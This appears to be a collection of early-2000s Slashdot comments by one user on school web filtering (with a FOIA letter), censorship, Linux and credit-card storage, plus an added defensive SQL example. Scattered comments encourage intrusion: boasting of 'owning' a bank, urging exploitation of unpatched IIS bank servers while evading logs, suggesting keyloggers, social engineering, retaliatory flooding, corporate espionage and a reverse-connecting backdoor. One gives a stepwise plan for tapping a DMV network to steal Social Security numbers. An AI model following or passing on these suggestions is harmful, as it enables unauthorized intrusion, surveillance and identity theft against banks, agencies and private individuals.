It isn't about filtering porn. It is more about the ability to view other websites. Many MANY MANY websites are miscategorized and blocked. MANY.
And MANY MANY MANY porn sites are not blocked, in fact it's VERY easy to find porn sites that are not filtered if you know what you are doing.
Plus now N2H2 is selling information about viewing habits of children at school, when they are forced to utilize the BESS proxy by the damn stupid government here in the United States. Sadly there is too much money being slipped under the table for votes on certain issues....
N2H2's setup is more than just blocking porn, it often blocks my access to highly informational sites about C coding and even blocks stuff on gnu.org... which definitely isn't porn or an online store.
Sorry, but you need to wake up and realize that it isn't all about some horny kid wanting to view porn in public.
You can gain access to this same information by utilizing the Freedom of Info act, since schools are operated by the Federal Govt.
Below is a letter I recently sent to my school district in Las Vegas, NV:
Freedom of Information Officer
Network Services
Clark County School District
2832 E Flamingo Rd.
Las Vegas, NV 89121
Re: Freedom of Information Act Request
Dear officer:
Under the Freedom of Information Act (5 U.S.C. 552) I would like to request the following materials from the Clark County School District (CCSD):
1) All documentation regarding the implementation of the Bess web proxy system provided to CCSD by N2H2. Including proxy configuration, network topology after installation, and the reasons for the Bess installation.
2) All access logs that are recorded by the Bess proxy filter. These logs should be provided in digital form, compressed using either ZIP or gzip compression algorithms.
3) Documentation regarding the effectiveness of Bess at blocking Internet sites deemed inappropriate for minors and sites that have been mis-categorized by Bess.
I am aware that I am entitled to make this request under the Freedom of Information Act, and if your agency response is not satisfactory, I am prepared to make an administrative appeal. Please indicate to me the name of the official to whom such an appeal should be addressed.
If my request is denied, I am entitled to know the reasons for denial.
I am aware that while the law allows your agency to withhold specified categories of exempted information, you are required by law to release any segregable portions that are left after the exempted material has been deleted from the data I am seeking.
I also request a waiver of all fees for this request. Disclosure of the requested information to me is in the public interest because it is likely to contribute significantly to public understanding of the operations or activities of the government, and is not in my commercial interest. I am classified as noncommercial news media under the Freedom of Information Act.
Sincerely,
xxx
Anyways, they responded back by sending me marketing materials from N2H2. Well, it's time to re-request the information and "be more specific."
Anyways, this does work well for pissing them off and scaring them to death, plus you can see how ineffective the filters really are.
Govt has no right in censorship of its people. The US Govt should not have the authority to deem what material is appropriate for its people. That is one of the freedoms here in the United States. We do not live in China where the govt dictates our lives. If a legal adult is at a library looking at inappropriate material or reading "questionable" materials, that is his/her choice... the Govt has no rule on what is appropriate or not for its legal adult citizens.
What about Gary's pussy shirt?
He had a jacket on over the gray shirt, it reads "pussy"
woah, a true hax0r there! I can hear his GF now:
"mount me baby!; fsck /dev/pussy; echo .*.*O /dev/pussy; umount me baby!"
Let's get some backbone providers to cooperate and track the true origins of the attacks (they probably spoof). Once we get the true origins, post the IP#s of systems on those networks to slashdot and we will give them the /. effect... times two :)
This does not make Jeff look like a criminal. The truth is that ANYBODY can find out that information, any employee, any customer. Want to verify that statement? Call their customer service and ask questions about their database and servers (ever hear of social engineering?).... don't ask directly, make them want to tell you the information you want.
Believe me, ANYBODY can get that information... fortunately Jeff is willing to speak out about it so that the general public can know the facts, instead of what some PR person tells the press.
But why have they not contacted me? Email is an EASY way to contact customers, yet they haven't.
They keep your CC# on file indefinitely, even if you have your account suspended. I honestly don't know why they keep your CC# in the databases?
This is always the problem with all these sites that are broken into.
Plus, for pete's sake.... deny (YES DENY) all select requests on the tables that contain cc#s... if your database can't deny SELECTs then you need a new DB server!
Fortunately Carnivore does help to lead investigators to people committing crimes by keeping logs of certain users/data. This is a Good Thing (tm) if the Carnivore beast does not log innocent civilian data.
I believe (and would hope) that the FBI should still be required to go through the courts before actually logging any data.
But I definitely believe that this was NOT a violation of anyone's rights, so why was it included in the "Your Rights Online" section?
This is a letter I wrote today to my local school district regarding their use of the Bess Internet filter (mentioned on other /. stories).
---
Freedom of Information Officer
Network Services
Clark County School District
2832 E Flamingo Rd.
Las Vegas, NV 89121
Re: Freedom of Information Act Request
Dear officer:
Under the Freedom of Information Act (5 U.S.C. 552) I would like to request the following materials from the Clark County School District (CCSD):
1) All documentation regarding the implementation of the Bess web proxy system provided to CCSD by N2H2. Including proxy configuration, network topology after installation, and the reasons for the Bess installation.
2) All access logs that are recorded by the Bess proxy filter. These logs should be provided in digital form, compressed using either ZIP or gzip compression algorithms.
3) Documentation regarding the effectiveness of Bess at blocking Internet sites deemed inappropriate for minors and sites that have been mis-categorized by Bess.
I am aware that I am entitled to make this request under the Freedom of Information Act, and if your agency response is not satisfactory, I am prepared to make an administrative appeal. Please indicate to me the name of the official to whom such an appeal should be addressed.
If my request is denied, I am entitled to know the reasons for denial.
I am aware that while the law allows your agency to withhold specified categories of exempted information, you are required by law to release any segregable portions that are left after the exempted material has been deleted from the data I am seeking.
I also request a waiver of all fees for this request. Disclosure of the requested information to me is in the public interest because it is likely to contribute significantly to public understanding of the operations or activities of the government, and is not in my commercial interest. I am classified as noncommercial news media under the Freedom of Information Act.
I personally have experience with a few online banks and I have only looked at Bank One once or twice and only for a few brief moments.... but if you really look deep into bank security you will find issues, for example:
Last year I "owned" a bank in Florida (that will go un-named) through some pretty well documented issues and the lack of patching on certain servers. Their servers were not only insecure, but the software running on them was insecure. Upon reporting the issues directly to the bank's CEO via phone and then faxing documentation to their offices, they never once contacted me to thank me. I documented ONLY one security issue and how to fix it, but I said there were _many_ more issues and that they needed a security audit.
Even to this day, they only fixed the one issue... I've documented my side in writing... It's their problem if they get hacked and someone starts stealing money from their database... Anyways, my point is that even though I detailed issues in both technical and non-technical forms.... they still did not care too much about security... Does it really take an "evil malicious cyber criminal" to wake a bank up ???
Another issue was this recent IIS Unicode decoding issue that allows escaping of the web root onto the physical hard drive root. Major issue... many banks still exhibit the bug and I've even noticed that some banks exhibiting the bug on their financial servers that talk with their databases even have full C: drives... where IIS usually stores logs. So guess what? I am not logged if I go exploit a server where its Web-logging drive (default Win NT install is C:) is full... how convenient!
I am not a "security expert" by any means, I am more a security enthusiast. Even I have been able to see MAJOR issues with banks being online. I will _NOT_ trust any of the banks that I have visited online yet.... there are just too many damn security issues involved.
Most banks don't even use IPSEC inside their firewall, another MAJOR issue.... Some banks run Win9x terminals, install a keylogger and log their whole damn telnet session to their server... damn you must be an EVIL MALICIOUS HACKER!
We as humanity are losing trustworthiness, which in return makes cryptography an everyday necessity. Humanity is evolving, we are growing more and more controlled by wealth and money, instead of human life. We now need cryptography and we have not scratched the surface of what it will become.
Maybe so, but maybe the reason for this "losing of trustworthiness" is due to our increasing reliance on encryption. I believe that our world will become more like a "better for humanity" instead of "better for me and my wealth" within the next 50 years... after of course the American economy collapses because some _smart_ hacker destroys the stock market.
Believe it or not, America will be a better place without any money being exchanged as it is now. But this process won't happen until technology relieves many people of work such as flipping burgers at McDonald's.... When technology can repair itself and live as a "being" then humanity will be ready to explore the universe and sciences instead of yelling and screaming "I want more money."
One day, I am betting that there will be a geek rebellion in the world. We computer geeks run more than 90% of the commerce in the United States in some way or another.
If all geeks took just ONE holiday, the nation would be in chaos. Those sheep need nerds... without nerds, they wouldn't be able to access their favorite porn site or download a 50 meg sex video.
Seriously, if politics continue on the path they are on, we may just have a geek rebellion on our hands. Can you imagine an army of geeks that all "love Big Brother" and memorize lines from 1984?
War is peace
Freedom is Slavery
Ignorance is Strength
Don't forget the most important:
Geeks are gods
If in prison, you can still gain access to technology through means that most guards would never be able to detect. Hell, I bet minimum and medium security prisons allow you to play with radios and calculators...
Now, can you imagine Linus being sent to prison for "hacking" and then programming a new Linux kernel for TI graphing calculators?
I bet he could do it
I am very interested in this topic. Utilizing almost any underground activities to gain access to information at another company.
Your government spies on other countries... It is my opinion that a corporation is just a smaller government body... I don't see too major of a problem.
Work as a janitor, gain access to lots of information at a ton of companies. Most companies, even ones with "good" security, do not think that their cleaning crews have the slightest clue what pgp, ssl, blowfish, and ssh are.
Does anyone know where to find information about gaining a career in this area... As a freelancer of course :)
Actually a few laptops have been recovered this way through the distributed.net client... which can run silently in the background.
It reports back to servers throughout the world on a regular basis.... without user interaction (normally).
Another way, is place a "backdoor" that uses STRONG encryption, and connects to a remote server (at your company). Like sshd... only REVERSED... sshd that establishes a connection to the outside system... allowing that outside system to gain shell access. (I saw something like this on the _new_ packetstorm recently)
Good luck on recovery.... Usually doing a "backdoor" is better, cause you can login and move information from your stolen system back inside your network.... and then trash the laptop (and then pursue the criminal).
Sadly they block even many GNU projects. This is not fun and games anymore.... luckily I found a GOOD solid way to bypass bess. I fear documenting it, since it may lead to a fix. So I just won't.... but there are ways around bess's filtering mechanisms.
Afraid of security? All those Win9x machines that are not able to cope with one Linux box that is able to spoof a server, undetected?
Linux is nothing to fear, IF the user that uses it knows what he/she is doing and can handle the system efficiently and still uses the network's file system to store work on. (For central location and backup reasons)
Are there any objections to actually implementing Linux for the users who know what they are doing?
I must agree on this topic, I hope it is included in the questions list. This sums up a majority of the questions, plus we will not receive any BS answer if they do not explain their reasoning.
Slashdot isn't about promoting Linux above other platforms; instead it is about posting news, rumors, and "Ask Slashdot".... it's about being open to new ideas.
Linux isn't the best OS, nor is Windows, nor Solaris, Irix, QNX, BSD.... etc.... there is no perfect OS.
Harm caused by slashdot is well deserved as it is just bringing to light news/events/ideas that interest geeks. That is why the slashdot pages always say "News for Nerds. Stuff that matters". It really does matter.
no. These systems are NOT decoys, they are active systems connected to the Internet in some form or another. Many of them can be quite critical to security.
I have followed different "hackers" (to me, hackers also means hella good coders, not just security experts) through Air traffic control systems and DoD weapons inventory systems. Believe it or not, many are vulnerable. And they are LIVE systems.
Why not insert the CC#s into a "NO-SELECT" privileges table (encrypted of course, both at record level and at filesystem level)? Then grant select to a different user (that is denied login from non-privileged IP#s).
Simple solution for many online stores, yet it is NEVER done (at least that I have seen), except for on my own store that I am coding.
So now, you have 3 levels of security on top of the normal database server, firewall, etc.
Then follow a new standard procedure of deleting credit card #s after billing and possibly replacing the field with only the last 4 digits or an MD5 so that you can verify it later.
Common sense, but nobody seems to want to follow it.
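The privilege split in this comment and the earlier "deny all SELECTs on the tables that contain cc#s" point, worked through as an added PostgreSQL example (not the commenter's own store code); the role, schema, database and host names are assumptions. It goes one step beyond the comment by keeping an HMAC under a server-side secret instead of a bare MD5, since an unkeyed hash of a 16-digit card number can be recovered by brute force over the small space of valid PANs.

```sql
-- Roles: the web shop connects as shop_app; only the billing batch job,
-- which runs from one fixed host, connects as billing_job.
-- (Role, schema, database and host names are assumptions for this illustration.)
CREATE EXTENSION IF NOT EXISTS pgcrypto;
CREATE ROLE shop_app    LOGIN PASSWORD '<shop-app-password>';
CREATE ROLE billing_job LOGIN PASSWORD '<billing-job-password>';

-- Full card numbers live only here, encrypted, and only until the order is billed.
CREATE SCHEMA vault;
CREATE TABLE vault.card_pending (
    order_id   bigint PRIMARY KEY,
    pan_cipher bytea NOT NULL,                  -- pgp_sym_encrypt(pan, enc_key) written by the shop
    created_at timestamptz NOT NULL DEFAULT now()
);

-- What survives billing: enough to display ("card ending 4242") and to
-- recognise the same card again later, but nothing that can be charged.
CREATE TABLE public.card_reference (
    order_id bigint PRIMARY KEY,
    last4    char(4) NOT NULL,
    pan_hmac bytea NOT NULL                     -- HMAC-SHA256 under a server-side secret
);

-- Least privilege: the web app may INSERT pending cards and read references,
-- but has no SELECT on the vault at all. Nothing is granted to PUBLIC.
REVOKE ALL ON SCHEMA vault FROM PUBLIC;
GRANT USAGE ON SCHEMA vault TO shop_app, billing_job;
GRANT INSERT ON vault.card_pending TO shop_app;              -- no SELECT / UPDATE / DELETE
GRANT SELECT ON public.card_reference TO shop_app;
GRANT SELECT, DELETE ON vault.card_pending TO billing_job;
GRANT INSERT ON public.card_reference TO billing_job;

-- The shop stores a card like this; a leaked shop_app credential alone
-- can write cards but never read one back:
--   INSERT INTO vault.card_pending (order_id, pan_cipher)
--   VALUES (1001, pgp_sym_encrypt('4242424242424242', '<enc-key>'));

-- Billing step, run as billing_job: decrypt inside the transaction, keep
-- last4 plus a keyed hash, then purge the full number. The PAN is never
-- returned to the caller. SECURITY INVOKER (the default) means the function
-- only works for a role that already holds the vault privileges above.
CREATE FUNCTION vault.finalize_order(p_order_id bigint, p_enc_key text, p_mac_key text)
RETURNS void LANGUAGE plpgsql AS $$
DECLARE
    v_pan text;
BEGIN
    SELECT pgp_sym_decrypt(pan_cipher, p_enc_key) INTO v_pan
      FROM vault.card_pending WHERE order_id = p_order_id;
    IF v_pan IS NULL THEN
        RAISE EXCEPTION 'no pending card for order %', p_order_id;
    END IF;
    INSERT INTO public.card_reference (order_id, last4, pan_hmac)
    VALUES (p_order_id, right(v_pan, 4), hmac(v_pan, p_mac_key, 'sha256'));
    DELETE FROM vault.card_pending WHERE order_id = p_order_id;
END $$;
REVOKE EXECUTE ON FUNCTION vault.finalize_order(bigint, text, text) FROM PUBLIC;
GRANT  EXECUTE ON FUNCTION vault.finalize_order(bigint, text, text) TO billing_job;

-- The "denied login from non-privileged IPs" part is not SQL; it goes in
-- pg_hba.conf, where the first matching line wins (assumed DB and host):
--   host  shopdb  billing_job  10.0.5.7/32  scram-sha-256
--   host  shopdb  billing_job  0.0.0.0/0    reject
```

Later, "have we seen this card before?" is answered by comparing `hmac(candidate_pan, mac_key, 'sha256')` against `card_reference.pan_hmac`, so the shop never needs the stored number again.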
I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.
He was not a "hacker", he just created one of the Unicode URLs that got parsed incorrectly by IIS. No skill.
Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
This is a VERY powerful system imager
http://systemimager.sourceforge.net/
The page says "Now supports: ext2, ext3, reiserfs, use without DHCP, and more!"
Worthwhile guys!
Walk in.
Find a corner with nobody around.
grab a cat-5, split wires off into a wireless transmitter.
hide cable away under a desk.
park a vehicle in parking lot of building with receiver inside, dumping to a laptop.
steal social security #s (most are unencrypted networks), personal info, address info, drivers license info, etc.
Enjoy. Guaranteed to work at your local DMV!
A proper request is "GET / HTTP/1.0" or "GET / HTTP/1.1\r\nHost: www.porn_cc_database.com\r\n\r\n"